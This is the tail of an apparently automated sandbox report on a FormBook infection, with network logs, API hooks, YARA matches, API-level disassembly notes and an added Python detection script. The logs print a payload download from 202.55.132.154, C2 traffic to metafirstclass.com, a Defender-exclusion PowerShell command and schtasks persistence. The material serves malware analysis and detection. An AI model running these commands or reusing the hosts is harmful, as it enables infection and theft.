                                    Nov 25, 2021 19:30:54.116276979 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116292000 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116306067 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116322994 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116336107 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116368055 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116385937 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116401911 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116539001 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:54.120157957 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:54.208468914 CET4916780192.168.2.2252.128.23.153

                                    UDP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Nov 25, 2021 19:30:53.426491022 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                    Nov 25, 2021 19:30:53.621328115 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22

                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Nov 25, 2021 19:30:53.426491022 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.metafirstclass.com | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Nov 25, 2021 19:30:53.621328115 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.metafirstclass.com | (none) | 52.128.23.153 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • 202.55.132.154
                                    • www.metafirstclass.com

                                    HTTP Packets

                                    Session ID: 0
                                    Source IP: 192.168.2.22
                                    Source Port: 49165
                                    Destination IP: 202.55.132.154
                                    Destination Port: 80
                                    Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                    Timestamp | kBytes transferred | Direction | Data
                                    Nov 25, 2021 19:29:20.959091902 CET | 0 | OUT | GET /384500000_1/vbc.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 202.55.132.154
                                    Connection: Keep-Alive
                                    Nov 25, 2021 19:29:21.195264101 CET | 1 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 25 Nov 2021 18:29:20 GMT
                                    Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                    Last-Modified: Thu, 25 Nov 2021 04:42:24 GMT
                                    ETag: "b0a00-5d19599d2da5b"
                                    Accept-Ranges: bytes
                                    Content-Length: 723456
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload


                                    Session ID: 1
                                    Source IP: 192.168.2.22
                                    Source Port: 49167
                                    Destination IP: 52.128.23.153
                                    Destination Port: 80
                                    Process: C:\Windows\explorer.exe

                                    Timestamp | kBytes transferred | Direction | Data
                                    Nov 25, 2021 19:30:53.961179972 CET | 760 | OUT | GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1
                                    Host: www.metafirstclass.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Nov 25, 2021 19:30:54.116276979 CET | 760 | IN | HTTP/1.1 463
                                    Server: nginx
                                    Date: Thu, 25 Nov 2021 18:30:54 GMT
                                    Content-Type: text/html
                                    Content-Length: 8915
                                    Connection: close
                                    ETag: "5e52d3ca-22d3"
                                    X-DIS-Request-ID: 9ab6992f058f33df87d2e92199f1ec19
                                    Set-Cookie: dis-remote-addr=84.17.52.63
                                    Set-Cookie: dis-timestamp=2021-11-25T10:30:54-08:00
                                    Set-Cookie: dis-request-id=9ab6992f058f33df87d2e92199f1ec19
                                    X-Frame-Options: sameorigin
                                    Nov 25, 2021 19:30:54.116292000 CET | 762 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"
                                    Nov 25, 2021 19:30:54.116306067 CET | 763 | IN | Data Ascii: ns_spacer.png" alt="" width="18" height="18" /></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> </tr> <tr> <td width="18"><img src="/DOAError/assets/i
                                    Nov 25, 2021 19:30:54.116322994 CET | 764 | IN | Data Ascii: > </tr> </table></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="55" /></td> </tr> <tr> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spa
                                    Nov 25, 2021 19:30:54.116336107 CET | 766 | IN | Data Ascii: png" width="10" height="120" alt=""/></td> <td width="500" align="center" class="errortitle">463</td> <td width="109" align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width
                                    Nov 25, 2021 19:30:54.116368055 CET | 767 | IN | Data Ascii: imagetext">Host<br /><span style="font-size: x-small" id="host2"></span><script>function myFunction2() { var x = location.host; document.getElementById("host2").innerHTML = x;}</script></td> </tr>
                                    Nov 25, 2021 19:30:54.116385937 CET | 768 | IN | Data Ascii: gn="center">|</td> <td width="30%" align="center"><table border="0" cellpadding="0" cellspacing="0"> <tbody> <tr> <td nowrap="nowrap"><div id="idtext"> Your IP Add
                                    Nov 25, 2021 19:30:54.116401911 CET | 769 | IN | Data Ascii: <tr> <td align="left" valign="top"><p class="bodytext"><strong>463 Restricted Client: </strong>This resource is not available for access by your client software. This request has been blocked. Please retry your request from a


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function Name | Hook Type | Active in Processes
                                    PeekMessageA | INLINE | explorer.exe
                                    PeekMessageW | INLINE | explorer.exe
                                    GetMessageW | INLINE | explorer.exe
                                    GetMessageA | INLINE | explorer.exe

                                    Processes

                                    Process: explorer.exe, Module: USER32.dll
                                    Function Name | Hook Type | New Data
                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEB
                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEB
                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEB
                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEB

                                    Statistics

                                    (Interactive charts not reproduced here: CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior, each linking to the per-process view.)

                                    System Behavior

                                    General

                                    Start time:19:28:14
                                    Start date:25/11/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f1a0000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:28:36
                                    Start date:25/11/2021
                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                    Imagebase:0x400000
                                    File size:543304 bytes
                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:28:41
                                    Start date:25/11/2021
                                    Path:C:\Users\Public\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\Public\vbc.exe"
                                    Imagebase:0x80000
                                    File size:723456 bytes
                                    MD5 hash:0F88779E9500075DE85E916637305164
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Antivirus matches:
                                    • Detection: 50%, ReversingLabs
                                    Reputation:low

                                    General

                                    Start time:19:28:43
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
                                    Imagebase:0x21f30000
                                    File size:452608 bytes
                                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    General

                                    Start time:19:28:44
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
                                    Imagebase:0x150000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:28:45
                                    Start date:25/11/2021
                                    Path:C:\Users\Public\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\Public\vbc.exe
                                    Imagebase:0x80000
                                    File size:723456 bytes
                                    MD5 hash:0F88779E9500075DE85E916637305164
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:19:28:50
                                    Start date:25/11/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0xffa10000
                                    File size:3229696 bytes
                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:19:29:01
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe
                                    Imagebase:0xd80000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:19:29:07
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\Public\vbc.exe"
                                    Imagebase:0x49dc0000
                                    File size:302592 bytes
                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
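The process list above contains the chain a responder would want to catch from process-creation telemetry alone: a payload executing from C:\Users\Public, schtasks.exe creating a task from an XML file in the user's Temp folder, rundll32.exe started with no DLL argument, and cmd.exe deleting the dropped vbc.exe. The following triage script is an added example, not part of this report or of Joe Sandbox. The events are constructed Sysmon-style records whose images and command lines mirror the entries above; the PIDs and the two benign control records at the end are assumptions added for illustration.

```python
"""Command-line triage for the process chain listed above (added example)."""
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records. Images and command lines
# mirror the report's process list; PIDs and the last two (benign) records are
# assumptions for illustration.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 2260, "image": r"C:\Users\Public\vbc.exe",
     "cmdline": r'"C:\Users\Public\vbc.exe"'},
    {"pid": 2292, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp"'},
    {"pid": 2460, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"pid": 2500, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\Public\vbc.exe"'},
    {"pid": 1234, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup" /XML "C:\ProgramData\backup\task.xml"'},
    {"pid": 1300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# A quoted argument (group 1) or a bare whitespace-delimited one (group 2).
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace while honouring double quotes."""
    return [quoted if quoted else bare for quoted, bare in _TOKEN.findall(cmdline)]


def _value_after(tokens: List[str], flag: str) -> str:
    """Return the token following a flag or verb (already lower-cased), or ''."""
    for i, tok in enumerate(tokens[:-1]):
        if tok == flag:
            return tokens[i + 1]
    return ""


def triage(event: Dict[str, object]) -> List[str]:
    """Apply the four rules suggested by the report's process chain to one event."""
    image = str(event["image"]).lower()
    name = image.rsplit("\\", 1)[-1]
    tokens = [t.lower() for t in tokenize(str(event["cmdline"]))]
    hits: List[str] = []

    # 1. Execution from a world-writable staging folder.
    if image.startswith("c:\\users\\public\\"):
        hits.append("process image under C:\\Users\\Public")

    # 2. Persistence: scheduled task imported from an XML file in user Temp.
    if name == "schtasks.exe" and "/create" in tokens:
        xml_path = _value_after(tokens, "/xml")
        if "\\appdata\\local\\temp\\" in xml_path:
            hits.append("schtasks /Create from task XML in user Temp")

    # 3. Sacrificial host process: rundll32.exe with no DLL/export to run.
    if name == "rundll32.exe" and len(tokens) <= 1:
        hits.append("rundll32.exe started without a DLL argument")

    # 4. Clean-up: cmd /c del of an executable dropped under C:\Users\Public.
    if name == "cmd.exe" and "/c" in tokens and "del" in tokens:
        target = _value_after(tokens, "del")
        if target.startswith("c:\\users\\public\\") and target.endswith(".exe"):
            hits.append("cmd /c del of executable in C:\\Users\\Public")

    return hits


def run_triage(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map each PID that triggered at least one rule to its list of hits."""
    results = {}
    for ev in events:
        hits = triage(ev)
        if hits:
            results[int(ev["pid"])] = hits
    return results


if __name__ == "__main__":
    for pid, hits in run_triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

Each rule on its own is noisy (legitimate installers also create tasks from Temp); the value is in seeing all four fire within seconds of each other under the same user session, which is what the timestamps above show.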

                                    Disassembly

                                    Code Analysis

                                      Executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: +$-
                                      • API String ID: 0-2137968064
                                      • Opcode ID: 7817c76bd24b1007a090c91602ad7e4f838c71e1c71d30cb679c4fbd76183b7f
                                      • Instruction ID: c3e2f6d901adb26cb78eaae62835d69d11c74285f6ce43c779fb80f2222ae73d
                                      • Opcode Fuzzy Hash: 7817c76bd24b1007a090c91602ad7e4f838c71e1c71d30cb679c4fbd76183b7f
                                      • Instruction Fuzzy Hash: 8851DF74C5522ACFEB30DF64C949BE9BBB0AB05304F1096EAD519AB294E7B44BC4CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: ($-
                                      • API String ID: 0-2099803033
                                      • Opcode ID: db1b6e0911a2266e29ea371fc7c03a1790177defa027470c410c95a0a4db1449
                                      • Instruction ID: 903ae7dbd94e7bbb52d2daf1c38b8f53422e0cb35b5fbdff037d26dcc1c0d39e
                                      • Opcode Fuzzy Hash: db1b6e0911a2266e29ea371fc7c03a1790177defa027470c410c95a0a4db1449
                                      • Instruction Fuzzy Hash: 78411F7095522DCFDB24CFA8D988BECB7B4AB49304F2082EAD509A7290D7709EC5CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: $-
                                      • API String ID: 0-1933255201
                                      • Opcode ID: 4472b1f34c235a0145b986a8b42f6e0feaabce1c67b05f4f5fa4efb13da91969
                                      • Instruction ID: e8b927e5ba0711b47f5af7018fac5886101e3c4d87eb82a468cd11bd6387fae1
                                      • Opcode Fuzzy Hash: 4472b1f34c235a0145b986a8b42f6e0feaabce1c67b05f4f5fa4efb13da91969
                                      • Instruction Fuzzy Hash: AC31BE7495522ACBEB20DFA8C948BEDB7B4BB08304F1082EAD509A7284D7709E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: ,$-
                                      • API String ID: 0-2049039173
                                      • Opcode ID: 980846d5dba339e0fc456a0d92c1334793306de1d24163380fa8d8c7f5b533cc
                                      • Instruction ID: aeb6360a67b997d933632ae589e23b0485b671c5644e16725fb2536ea8a0549b
                                      • Opcode Fuzzy Hash: 980846d5dba339e0fc456a0d92c1334793306de1d24163380fa8d8c7f5b533cc
                                      • Instruction Fuzzy Hash: 5C21B27495422ECFEB20CFA4C948BECBBB4BB08305F1082EAD409AB294D7744AC5DF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002FC83F
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: fab84583ea85b9bebba66740211bcac517804d7ed502ae1481f3e45b550234ca
                                      • Instruction ID: d0b802495f6490494c0de4da6ba648e2cb761f4c92d0dc3f9b2ddff7405a32dc
                                      • Opcode Fuzzy Hash: fab84583ea85b9bebba66740211bcac517804d7ed502ae1481f3e45b550234ca
                                      • Instruction Fuzzy Hash: 7CC13571D0422D8FCB20DFA4C941BEDBBB1BF49304F1095A9E919B7240EB749A99CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FC2B3
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 62c3f11985f9146e1f218a02479e63ecaa2a762ef5d4df9e0331b55a730f966b
                                      • Instruction ID: e72dc7f6cc94ac2f3b41d96476da7e706812a49651278c2613f8e041eb9af18e
                                      • Opcode Fuzzy Hash: 62c3f11985f9146e1f218a02479e63ecaa2a762ef5d4df9e0331b55a730f966b
                                      • Instruction Fuzzy Hash: 9A41AAB4D0525C9FCF00CFA9D984AEEFBB1BB49304F20942AE915B7200D775AA55CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FC3F2
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: f0ab952ad51ab46a0215e35f6dddf2a2137fbdc0c6a9e59c00767b06fe189c8b
                                      • Instruction ID: 9c8b082c1eea6d29e0786784bfafd53df3e3651e1ba6969e6865180563b11451
                                      • Opcode Fuzzy Hash: f0ab952ad51ab46a0215e35f6dddf2a2137fbdc0c6a9e59c00767b06fe189c8b
                                      • Instruction Fuzzy Hash: AB41A6B4D0425C9FCF00CFA9D884AEEFBB1BB49310F20942AE915B7200D775A956CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002FC162
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: df5e4452d8bebbdc2ec9f28434a4afd7a0fe5622b40e602b01ea4cda90373842
                                      • Instruction ID: 2b4c4e8ad0fbca8675cc034be8f05905d8afbcaae9760a7631c8ff491d7938a7
                                      • Opcode Fuzzy Hash: df5e4452d8bebbdc2ec9f28434a4afd7a0fe5622b40e602b01ea4cda90373842
                                      • Instruction Fuzzy Hash: FF41A8B4D0425C9BCF00CFA9D880AAEFBB1BB49310F20942AE915B7200D735A916CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 002FC037
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: ea3c3a145a5ed3deaca604cfb817d6a056d305e14c6157be2a5bba4ab9927b90
                                      • Instruction ID: c551901c907b139b5ec2a08a0b23a8052d2dc27728af9ae45951729dc3429adb
                                      • Opcode Fuzzy Hash: ea3c3a145a5ed3deaca604cfb817d6a056d305e14c6157be2a5bba4ab9927b90
                                      • Instruction Fuzzy Hash: 7D41BBB4D0525C9FCB10CFA9D884AEEFBB1AF49314F24842AE415B7240D779A946CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 002FBF16
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 15d5590bb307315ba549774f6e573774c7e28998c7dff401283c2bfb5a1c1783
                                      • Instruction ID: ebba8c5d1a764da891fb2f8502dee2aeb5dd01dedbfa72462b2952b6feabbf09
                                      • Opcode Fuzzy Hash: 15d5590bb307315ba549774f6e573774c7e28998c7dff401283c2bfb5a1c1783
                                      • Instruction Fuzzy Hash: 3F31D8B4D1421C9FCF14CFA9D884AAEFBB5AF49314F14842AE815B7300D735A906CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%
